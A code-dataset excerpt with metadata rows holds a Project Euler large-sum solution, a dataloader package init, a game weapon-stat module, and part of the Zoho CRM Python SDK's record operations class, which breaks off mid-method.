anadahalli/project-euler
|
d4150a5a6c54cf9f4edcd024df69b01bf03c2a10
|
[
"CC0-1.0"
] | null | null | null |
"""Problem 013
Work out the first ten digits of the sum of the following
one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
"""
num = """37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690"""
# Sum the hundred 50-digit numbers and keep only the first ten digits.
total = sum(int(line) for line in num.split('\n'))
ans = str(total)[:10]
print(ans)
| 48.816901
| 59
| 0.973937
| 236
| 10,398
| 42.911017
| 0.538136
| 0.000987
| 0.029624
| 0.039498
| 0.987459
| 0.987459
| 0.987459
| 0.987459
| 0.987459
| 0.987459
| 0
| 0.984747
| 0.022697
| 10,398
| 212
| 60
| 49.04717
| 0.011809
| 0.500096
| 0
| 0
| 0
| 0
| 0.982662
| 0.963206
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.009709
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
098e1794f898ef6f88e8e340034b27194c271d07
| 172
|
py
|
Python
|
dataloaders/__init__.py
|
GT-RIPL/DistillMatch-SSCL
|
e572671fd6994b3c43ad6e46e9efb3588804524c
|
[
"MIT"
] | 9
|
2021-07-13T07:08:19.000Z
|
2022-01-27T13:41:19.000Z
|
dataloaders/__init__.py
|
GT-RIPL/DistillMatch-SSCL
|
e572671fd6994b3c43ad6e46e9efb3588804524c
|
[
"MIT"
] | null | null | null |
dataloaders/__init__.py
|
GT-RIPL/DistillMatch-SSCL
|
e572671fd6994b3c43ad6e46e9efb3588804524c
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
# Re-export the dataset loaders so callers can write
# `from dataloaders import iCIFAR100` etc.; __all__ pins the public API.
from .inc_ssl import iCIFAR100, iCIFAR10, SSLDataLoader, iTinyIMNET
__all__ = ('iCIFAR100','iCIFAR10','SSLDataLoader','iTinyIMNET')
| 34.4
| 67
| 0.80814
| 18
| 172
| 7.166667
| 0.611111
| 0.263566
| 0.465116
| 0.620155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063694
| 0.087209
| 172
| 5
| 68
| 34.4
| 0.757962
| 0
| 0
| 0
| 0
| 0
| 0.231214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
09c876a4240ab268ff1783bdc0c6205d8f4ccae5
| 7,215
|
py
|
Python
|
kobayashi/weapons/core_weapons.py
|
TheDataLeek/kobayashi
|
2bc17f7be94f7df97d7501d3a51308adfce1f0c2
|
[
"MIT"
] | 1
|
2019-03-26T19:27:09.000Z
|
2019-03-26T19:27:09.000Z
|
kobayashi/weapons/core_weapons.py
|
TheDataLeek/kobayashi
|
2bc17f7be94f7df97d7501d3a51308adfce1f0c2
|
[
"MIT"
] | null | null | null |
kobayashi/weapons/core_weapons.py
|
TheDataLeek/kobayashi
|
2bc17f7be94f7df97d7501d3a51308adfce1f0c2
|
[
"MIT"
] | null | null | null |
from .base_weapon import Weapon, check_ammo
from ..util import dice
class MultifocalLaser(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
power=5
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(1, 4)
class ReaperBattery(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
clumsy=True,
power=4
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 4)
class FractalImpactCharges(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
ammo=4,
power=5,
to_hit_mod=11
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 6) + self.extra_dmg
class PolyspectralMESBeam(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=25,
weap_phase=1,
power=5
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 4)
class Sandthrower(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
flak=True,
power=3
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 4)
class FlakEmitterBattery(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=10,
flak=True,
power=5,
free_mass=3,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 6)
class TorpedoLauncher(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
ammo=4,
power=10,
free_mass=3,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 8)
class ChargedParticleCaster(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
clumsy=True,
power=10,
hardpoints=2,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 6)
class PlasmaBeam(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=10,
power=5,
free_mass=2,
hardpoints=2,
to_hit_mod=8,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 6) + self.extra_dmg
class MagSpikeArray(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
flak=True,
weap_phase=1,
ammo=10,
power=5,
free_mass=2,
hardpoints=2,
min_class=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 6) + self.extra_dmg
class SpinalBeamCannon(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
weap_phase=1,
clumsy=True,
power=10,
free_mass=5,
hardpoints=3,
min_class=2
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 10)
class SmartCloud(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
cloud=True,
clumsy=True,
power=10,
free_mass=5,
hardpoints=2,
min_class=2,
to_hit_mod=8
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 10) + self.extra_dmg
class Gravcannon(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
power=15,
free_mass=4,
hardpoints=3,
min_class=2,
to_hit_mod=8
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(4, 6) + self.extra_dmg
class SpikeInversionProjector(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=15,
weap_phase=2,
power=10,
free_mass=3,
hardpoints=3,
min_class=2,
to_hit_mod=1
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 8) + self.extra_dmg
class VortexTunnelInductor(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
weap_phase=1,
clumsy=True,
power=20,
free_mass=10,
hardpoints=4,
min_class=3
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(3, 20)
class MassCannon(Weapon):
def __init__(self, *args, **kwargs):
super().__init__(
armor_pen=20,
weap_phase=3,
ammo=4,
power=10,
free_mass=5,
hardpoints=4,
min_class=3
)
self.__dict__ = {**self.__dict__, **kwargs}
@property
@check_ammo
def wdamage(self, *args, **kwargs):
return dice(2, 20)
class LightningChargeMantle(Weapon):
    """Lightning charge mantle: cloud-type weapon (pen 5, to-hit +5)."""

    def __init__(self, *args, **kwargs):
        # Fixed chassis stats for this weapon type.
        super().__init__(
            armor_pen=5,
            cloud=True,
            power=15,
            free_mass=5,
            hardpoints=2,
            min_class=3,
            to_hit_mod=5
        )
        # Caller-supplied keyword overrides win over the defaults above.
        self.__dict__.update(kwargs)

    @property
    @check_ammo
    def wdamage(self, *args, **kwargs):
        """Damage roll: 1d20 plus this weapon's extra_dmg bonus."""
        roll = dice(1, 20)
        return roll + self.extra_dmg
class SingularityGun(Weapon):
    """Singularity gun: top-end phase-6 weapon (pen 20, 5 hardpoints)."""

    def __init__(self, *args, **kwargs):
        # Fixed chassis stats for this weapon type.
        super().__init__(
            armor_pen=20,
            weap_phase=6,
            power=25,
            free_mass=10,
            hardpoints=5,
            min_class=3,
            to_hit_mod=5
        )
        # Caller-supplied keyword overrides win over the defaults above.
        self.__dict__.update(kwargs)

    @property
    @check_ammo
    def wdamage(self, *args, **kwargs):
        """Damage roll: 5d20 plus this weapon's extra_dmg bonus."""
        roll = dice(5, 20)
        return roll + self.extra_dmg
| 22.904762
| 51
| 0.519751
| 773
| 7,215
| 4.364812
| 0.086675
| 0.085359
| 0.149378
| 0.090694
| 0.812982
| 0.792235
| 0.777416
| 0.771191
| 0.704209
| 0.704209
| 0
| 0.033362
| 0.356064
| 7,215
| 314
| 52
| 22.977707
| 0.692854
| 0
| 0
| 0.738462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.138462
| false
| 0
| 0.007692
| 0.069231
| 0.284615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09e0ed10ea9c046e6ad0c6ef69fe5a8bfe28f486
| 49,696
|
py
|
Python
|
zcrmsdk/src/com/zoho/crm/api/record/record_operations.py
|
zoho/zohocrm-python-sdk-2.1
|
cde6fcd1c5c8f7a572154ebb2b947ec697c24209
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/record/record_operations.py
|
zoho/zohocrm-python-sdk-2.1
|
cde6fcd1c5c8f7a572154ebb2b947ec697c24209
|
[
"Apache-2.0"
] | null | null | null |
zcrmsdk/src/com/zoho/crm/api/record/record_operations.py
|
zoho/zohocrm-python-sdk-2.1
|
cde6fcd1c5c8f7a572154ebb2b947ec697c24209
|
[
"Apache-2.0"
] | null | null | null |
try:
from zcrmsdk.src.com.zoho.crm.api.exception import SDKException
from zcrmsdk.src.com.zoho.crm.api.parameter_map import ParameterMap
from zcrmsdk.src.com.zoho.crm.api.util import APIResponse, CommonAPIHandler, Utility, Constants
from zcrmsdk.src.com.zoho.crm.api.param import Param
from zcrmsdk.src.com.zoho.crm.api.header import Header
from zcrmsdk.src.com.zoho.crm.api.header_map import HeaderMap
except Exception:
from ..exception import SDKException
from ..parameter_map import ParameterMap
from ..util import APIResponse, CommonAPIHandler, Utility, Constants
from ..param import Param
from ..header import Header
from ..header_map import HeaderMap
class RecordOperations(object):
def __init__(self):
"""Creates an instance of RecordOperations"""
pass
def get_record(self, id, module_api_name, param_instance=None, header_instance=None):
"""
The method to get record
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def update_record(self, id, module_api_name, request, header_instance=None):
"""
The method to update record
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_PUT)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def delete_record(self, id, module_api_name, param_instance=None, header_instance=None):
"""
The method to delete record
Parameters:
id (int) : An int representing the id
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(id, int):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: id EXPECTED TYPE: int', None, None)
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
api_path = api_path + '/'
api_path = api_path + str(id)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def get_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to get records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_GET)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_READ)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.response_handler import ResponseHandler
except Exception:
from .response_handler import ResponseHandler
return handler_instance.api_call(ResponseHandler.__module__, 'application/json')
def create_records(self, module_api_name, request, header_instance=None):
"""
The method to create records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_POST)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_CREATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def update_records(self, module_api_name, request, header_instance=None):
"""
The method to update records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if request is not None and not isinstance(request, BodyWrapper):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: request EXPECTED TYPE: BodyWrapper', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_PUT)
handler_instance.set_category_method(Constants.REQUEST_CATEGORY_UPDATE)
handler_instance.set_content_type('application/json')
handler_instance.set_request(request)
handler_instance.set_header(header_instance)
handler_instance.set_module_api_name(module_api_name)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def delete_records(self, module_api_name, param_instance=None, header_instance=None):
"""
The method to delete records
Parameters:
module_api_name (string) : A string representing the module_api_name
param_instance (ParameterMap) : An instance of ParameterMap
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
if not isinstance(module_api_name, str):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: module_api_name EXPECTED TYPE: str', None, None)
if param_instance is not None and not isinstance(param_instance, ParameterMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: param_instance EXPECTED TYPE: ParameterMap', None, None)
if header_instance is not None and not isinstance(header_instance, HeaderMap):
raise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: header_instance EXPECTED TYPE: HeaderMap', None, None)
handler_instance = CommonAPIHandler()
api_path = ''
api_path = api_path + '/crm/v2.1/'
api_path = api_path + str(module_api_name)
handler_instance.set_api_path(api_path)
handler_instance.set_http_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_category_method(Constants.REQUEST_METHOD_DELETE)
handler_instance.set_param(param_instance)
handler_instance.set_header(header_instance)
Utility.get_fields(module_api_name, handler_instance)
try:
from zcrmsdk.src.com.zoho.crm.api.record.action_handler import ActionHandler
except Exception:
from .action_handler import ActionHandler
return handler_instance.api_call(ActionHandler.__module__, 'application/json')
def upsert_records(self, module_api_name, request, header_instance=None):
"""
The method to upsert records
Parameters:
module_api_name (string) : A string representing the module_api_name
request (BodyWrapper) : An instance of BodyWrapper
header_instance (HeaderMap) : An instance of HeaderMap
Returns:
APIResponse: An instance of APIResponse
Raises:
SDKException
"""
try:
from zcrmsdk.src.com.zoho.crm.api.record.body_wrapper import BodyWrapper
except Exception:
from .body_wrapper import BodyWrapper
if not isinstance(module_api_name, str):
